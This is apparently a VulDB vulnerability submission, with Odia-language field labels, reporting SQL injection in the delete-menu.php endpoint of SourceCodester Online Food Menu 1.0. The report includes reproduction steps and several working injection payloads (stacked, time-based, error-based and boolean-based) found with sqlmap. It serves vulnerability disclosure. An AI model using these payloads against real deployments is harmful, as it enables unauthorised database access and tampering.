| ଶୀର୍ଷକ | SourceCodester Online Food Menu 1.0 SQL Injection |
|---|
| ବର୍ଣ୍ଣନା | Dear Vuldb
I hope this message finds you well. I would like to report a SQL injection vulnerability I discovered in the sourcecodester of the Online Food Menu Using PHP and MySQL with Source Code during my testing.
Details:
Affected URL/Endpoint: /food-menu/endpoint/delete-menu.php
Vulnerable Parameter: menu
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Navigate to the Admin area page.
2) Use a proxy like burpsuite to intercept the "delete-menu" request.
3) Input the payload "/food-menu/endpoint/delete-menu.php?menu=4';SELECT+SLEEP(7)%23" to invoke the SQL injection.
4) the menu is also vulnerable to the following attackes after running sqlmap on it.
arameter: menu (GET)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: menu=4' AND EXTRACTVALUE(8269,CASE WHEN (8269=8269) THEN 8269 ELSE 0x3A END)-- jhtJ
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: menu=4' AND GTID_SUBSET(CONCAT(0x71627a6a71,(SELECT (ELT(1777=1777,1))),0x716b6a7071),1777)-- uuXb
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: menu=4';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: menu=4' AND (SELECT 7516 FROM (SELECT(SLEEP(5)))ythw)-- AVNZ
Please let me know if you need further information or a more detailed analysis.
Best regards,
[Your Name] |
|---|
| ଉପଭୋକ୍ତା | Delvy (UID 74555) |
|---|
| ଦାଖଲ | 09/06/2024 04:30 AM (1 ବର୍ଷ ago) |
|---|
| ମଧ୍ୟମ ଧରଣର | 09/06/2024 11:30 PM (19 hours later) |
|---|
| ସ୍ଥିତି | ଗ୍ରହଣ କରାଯାଇଛି |
|---|
| VulDB ଏଣ୍ଟ୍ରି | 276779 [SourceCodester Online Food Menu 1.0 delete-menu.php menu SQL ଇଞ୍ଜେକ୍ସନ] |
|---|
| ପଏଣ୍ଟ | 17 |
|---|